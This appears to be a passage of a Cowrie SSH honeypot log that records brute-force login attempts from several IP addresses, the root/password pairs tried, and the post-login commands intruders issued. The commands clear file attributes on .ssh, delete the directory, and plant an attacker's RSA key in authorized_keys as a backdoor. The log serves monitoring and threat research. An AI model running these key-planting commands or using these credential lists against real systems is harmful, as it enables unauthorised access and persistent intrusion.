03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.428025Z","src_ip":"212.227.235.229","session":"61f4d1bd3794"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:28.608072Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:29.583312Z","src_ip":"212.227.235.229","session":"61f4d1bd3794"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei2023","message":"login attempt [root/Huawei2023] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:29.803631Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:29.863130Z","src_ip":"212.227.235.229","session":"1ddf471cfb77"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:29.864059Z","src_ip":"212.227.235.229","session":"61f4d1bd3794"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:30.401573Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:30.402235Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:30.403080Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:30.692355Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:31.741200Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:02:31.741955Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:02:31.744026Z","src_ip":"212.227.125.160","session":"2cc149268be8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:02:31.744672Z","src_ip":"212.227.125.160","session":"2cc149268be8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.032789Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.033706Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35256,"dst_ip":"1.2.3.4","dst_port":22,"session":"49ed2245b59f","protocol":"ssh","message":"New connection: 212.227.235.229:35256 (1.2.3.4:22) [session: 49ed2245b59f]","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.322004Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.322555Z","src_ip":"212.227.235.229","session":"49ed2245b59f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33714,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f84034b06e8","protocol":"ssh","message":"New connection: 212.227.125.160:33714 (1.2.3.4:22) [session: 0f84034b06e8]","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.409535Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:32.611602Z","src_ip":"212.227.235.229","session":"49ed2245b59f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:02:33.020166Z","src_ip":"212.227.125.160","session":"0f84034b06e8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:02:33.021250Z","src_ip":"212.227.125.160","session":"0f84034b06e8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:33.810092Z","src_ip":"212.227.235.229","session":"49ed2245b59f"}
{"eventid":"cowrie.login.failed","username":"test3","password":"admin123","message":"login attempt [test3/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:34.688078Z","src_ip":"212.227.125.160","session":"0f84034b06e8"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:35.101008Z","src_ip":"212.227.235.229","session":"49ed2245b59f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36396,"dst_ip":"1.2.3.4","dst_port":22,"session":"73a1c456df61","protocol":"ssh","message":"New connection: 212.227.235.229:36396 (1.2.3.4:22) [session: 73a1c456df61]","sensor":"my-vps","timestamp":"2025-08-31T06:02:35.384328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:35.385011Z","src_ip":"212.227.235.229","session":"73a1c456df61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:35.669849Z","src_ip":"212.227.235.229","session":"73a1c456df61"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:36.052567Z","src_ip":"212.227.125.160","session":"0f84034b06e8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:36.850211Z","src_ip":"212.227.235.229","session":"73a1c456df61"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:37.137477Z","src_ip":"212.227.235.229","session":"f636d091a780"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:37.138873Z","src_ip":"212.227.235.229","session":"73a1c456df61"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40212,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f29bda43cbe","protocol":"ssh","message":"New connection: 212.227.235.229:40212 (1.2.3.4:22) [session: 0f29bda43cbe]","sensor":"my-vps","timestamp":"2025-08-31T06:02:46.834009Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:46.834976Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:47.138848Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.login.success","username":"root","password":"8uhb*UHB","message":"login attempt [root/8uhb*UHB] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:02:48.396324Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:49.024390Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:49.025081Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:02:49.025938Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:49.331002Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:02:49.995989Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:02:49.996664Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:02:50.301735Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:50.302640Z","src_ip":"212.227.235.229","session":"0f29bda43cbe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41736,"dst_ip":"1.2.3.4","dst_port":22,"session":"309ad622927a","protocol":"ssh","message":"New connection: 212.227.235.229:41736 (1.2.3.4:22) [session: 309ad622927a]","sensor":"my-vps","timestamp":"2025-08-31T06:02:50.552205Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:50.552963Z","src_ip":"212.227.235.229","session":"309ad622927a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:02:50.829910Z","src_ip":"212.227.235.229","session":"309ad622927a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:02:51.978517Z","src_ip":"212.227.235.229","session":"309ad622927a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:02:53.259759Z","src_ip":"212.227.235.229","session":"309ad622927a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42856,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2f5bd2cd81c","protocol":"ssh","message":"New connection: 212.227.235.229:42856 (1.2.3.4:22) [session: f2f5bd2cd81c]","sensor":"my-vps","timestamp":"2025-08-31T06:02:53.555454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:02:53.556330Z","src_ip":"212.227.235.229","session":"f2f5bd2cd81c"}
